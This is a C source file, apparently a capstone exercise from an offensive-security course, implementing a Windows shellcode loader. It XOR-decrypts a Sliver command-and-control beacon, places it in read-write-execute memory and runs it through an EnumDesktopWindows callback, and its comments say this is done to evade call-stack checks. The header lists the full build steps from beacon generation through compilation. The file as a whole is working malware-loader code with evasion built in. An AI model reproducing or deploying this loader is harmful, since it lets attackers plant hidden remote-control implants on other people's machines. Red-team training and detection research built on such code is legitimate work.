/*
 * Script: loader.c
 * Module: 11 — Assembling The Pieces (Capstone)
 * Purpose: XOR-decrypt Sliver shellcode and execute via EnumDesktopWindows callback
 * Usage:   x86_64-w64-mingw32-gcc loader.c -o beacon.exe -luser32 -Os -s
 * Target:  Windows x64 hosts
 *
 * Shellcode header (shellcode.h) is generated by xor_encrypt.py from beacon.bin.
 * EnumDesktopWindows is used as the execution primitive so the shellcode
 * has a legitimate Win32 call stack origin, evading naive call-stack checks.
 *
 * Build steps:
 *   1. Generate Sliver shellcode:  generate --os windows --arch amd64 --format shellcode -o beacon.bin
 *   2. Encrypt:                    python3 xor_encrypt.py beacon.bin shellcode.h
 *   3. Compile:                    x86_64-w64-mingw32-gcc loader.c -o beacon.exe -luser32 -Os -s
 */

#include <windows.h>
#include "shellcode.h"   /* defines: unsigned char payload[], unsigned int payload_len,
                                     unsigned char key[],     unsigned int key_len      */

int main(void) {
    /* Step 1: XOR-decrypt payload in-place using key from shellcode.h */
    for (unsigned int i = 0; i < payload_len; i++) {
        payload[i] ^= key[i % key_len];
    }

    /* Step 2: Allocate RWX memory and copy decrypted shellcode */
    void *exec = VirtualAlloc(
        NULL,
        payload_len,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );
    if (!exec) return 1;
    memcpy(exec, payload, payload_len);

    /* Step 3: Execute shellcode as EnumDesktopWindows callback
     *
     * EnumDesktopWindows iterates desktop window handles, calling the
     * supplied WNDENUMPROC for each. Casting the shellcode address to
     * WNDENUMPROC and supplying it as the callback causes the shellcode
     * to execute in the current thread with a Win32 API on the call stack.
     *
     * The second argument (lParam / 0) is ignored by the shellcode.
     */
    EnumDesktopWindows(
        GetThreadDesktop(GetCurrentThreadId()),
        (WNDENUMPROC)exec,
        0
    );

    /* Execution returns here after the Sliver beacon spawns its own thread */
    VirtualFree(exec, 0, MEM_RELEASE);
    return 0;
}
